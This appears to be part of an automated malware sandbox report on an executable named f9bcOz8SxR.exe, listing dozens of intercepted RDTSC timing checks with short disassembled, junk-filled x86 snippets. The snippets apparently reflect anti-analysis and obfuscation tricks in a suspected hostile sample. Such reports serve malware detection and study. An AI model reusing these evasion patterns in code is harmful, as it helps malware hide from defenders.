Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1078D5E second address: 1078D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1078D6B second address: 1078D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1078D71 second address: 1078D80 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jne 00007F6184CCBA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10435FD second address: 1043679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6184834896h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F6184834898h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 stc 0x00000027 call 00007F61848348A8h 0x0000002c mov ch, 8Dh 0x0000002e pop edx 0x0000002f lea eax, dword ptr [ebp+12479357h] 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007F6184834898h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D2A82h] 0x00000055 push eax 0x00000056 push ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 jne 00007F6184834896h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1043679 second address: 102BAF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F6184CCBA78h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push edi 0x00000025 pushad 0x00000026 movsx edi, si 0x00000029 js 00007F6184CCBA76h 0x0000002f popad 0x00000030 pop edi 0x00000031 or edx, 7237A705h 0x00000037 call dword ptr [ebp+122D32C0h] 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 js 00007F6184CCBA76h 0x00000047 push edi 0x00000048 pop edi 0x00000049 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10437F5 second address: 10437FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1043BAF second address: 1043BF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 55A6BFCEh 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F6184CCBA78h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 93D0AEFBh 0x0000002f jng 00007F6184CCBA8Ah 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1043CFE second address: 1043D3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F6184834898h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 add edx, dword ptr [ebp+122D2B22h] 0x00000027 and ecx, 1EF1A52Dh 0x0000002d nop 0x0000002e push edx 0x0000002f jbe 00007F618483489Ch 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1043D3C second address: 1043D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jng 00007F6184CCBA96h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6184CCBA88h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104441E second address: 104443A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F61848348A8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104443A second address: 1044469 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D226Dh] 0x0000000f push 0000001Eh 0x00000011 mov dword ptr [ebp+122D32B9h], esi 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b jmp 00007F6184CCBA83h 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1044469 second address: 104446E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1044572 second address: 1044576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104480A second address: 1044856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edx, dword ptr [ebp+122D2B32h] 0x0000000e or edx, 337EC500h 0x00000014 lea eax, dword ptr [ebp+12479357h] 0x0000001a ja 00007F61848348BCh 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1044856 second address: 104485B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104485B second address: 104486C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104486C second address: 1044872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1044872 second address: 102C5CB instructions: 0x00000000 rdtsc 0x00000002 js 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ch, 3Fh 0x0000000f call dword ptr [ebp+122D3298h] 0x00000015 pushad 0x00000016 jnc 00007F618483489Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007F6184834896h 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102C5CB second address: 102C5CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102C5CF second address: 102C61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6184834896h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F61848348BCh 0x00000012 jmp 00007F61848348A0h 0x00000017 jmp 00007F61848348A6h 0x0000001c jmp 00007F618483489Dh 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 pop esi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102C61A second address: 102C642 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6184CCBA80h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F6184CCBA7Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102C642 second address: 102C654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F6184834898h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1000EA7 second address: 1000EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6184CCBA76h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C3CC second address: 107C3D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C3D4 second address: 107C3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C7C2 second address: 107C7C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C7C8 second address: 107C7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C935 second address: 107C939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C939 second address: 107C93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C93F second address: 107C954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F618483489Fh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CA8D second address: 107CAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6184CCBA86h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CAA7 second address: 107CAAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CAAD second address: 107CAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CAB3 second address: 107CAB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CAB7 second address: 107CAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CAC4 second address: 107CACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CACA second address: 107CACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CACE second address: 107CADC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1000ECA second address: 1000ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CDA5 second address: 107CDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6184834896h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CDB9 second address: 107CDDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Fh 0x00000007 jo 00007F6184CCBA76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 jg 00007F6184CCBA76h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CDDC second address: 107CDFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F61848348A8h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CDFA second address: 107CE04 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6184CCBA76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CE04 second address: 107CE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F61848348A9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107E8EA second address: 107E8EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107E8EF second address: 107E8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1082AC1 second address: 1082ACF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1082ACF second address: 1082AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F618483489Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1082AE1 second address: 1082AE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1082AE9 second address: 1082AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1082DB4 second address: 1082DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10831DC second address: 10831E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10831E0 second address: 10831FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F6184CCBA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d jo 00007F6184CCBAA8h 0x00000013 jo 00007F6184CCBA7Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10831FB second address: 1083215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F61848348A2h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1083215 second address: 108321F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6184CCBA76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10827A6 second address: 10827C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F6184834896h 0x0000000e jmp 00007F61848348A3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10836CC second address: 10836DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6184CCBA7Ch 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 108381F second address: 1083823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1083ABE second address: 1083ACD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007F6184CCBA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1083ACD second address: 1083ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jo 00007F618483489Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 108ABD6 second address: 108ABE0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6184CCBA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 108AEC4 second address: 108AEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 108AEC8 second address: 108AED2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 108AED2 second address: 108AEDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 108AEDB second address: 108AEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 108B03F second address: 108B043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 108B043 second address: 108B047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 108B784 second address: 108B788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 108BD1C second address: 108BD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6184CCBA7Dh 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1090E11 second address: 1090E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F61848348A4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10958D8 second address: 10958DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10958DC second address: 1095915 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jne 00007F6184834896h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push edi 0x00000011 jl 00007F61848348AEh 0x00000017 jmp 00007F61848348A8h 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jnl 00007F6184834896h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1095A4D second address: 1095A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1095A51 second address: 1095A57 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 109DAA0 second address: 109DAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 109DAA6 second address: 109DAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6184834896h 0x0000000a popad 0x0000000b push edi 0x0000000c jmp 00007F618483489Ch 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10442DB second address: 10442E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10442E1 second address: 10442E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 109D7C1 second address: 109D7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6184CCBA7Bh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jmp 00007F6184CCBA7Eh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 je 00007F6184CCBA76h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 109D7EE second address: 109D7F4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 109D7F4 second address: 109D806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6184CCBA7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 109D806 second address: 109D827 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F61848348A4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A27EA second address: 10A27EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A1C23 second address: 10A1C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F6184834896h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A1D97 second address: 10A1D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A1D9B second address: 10A1DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F61848348A8h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
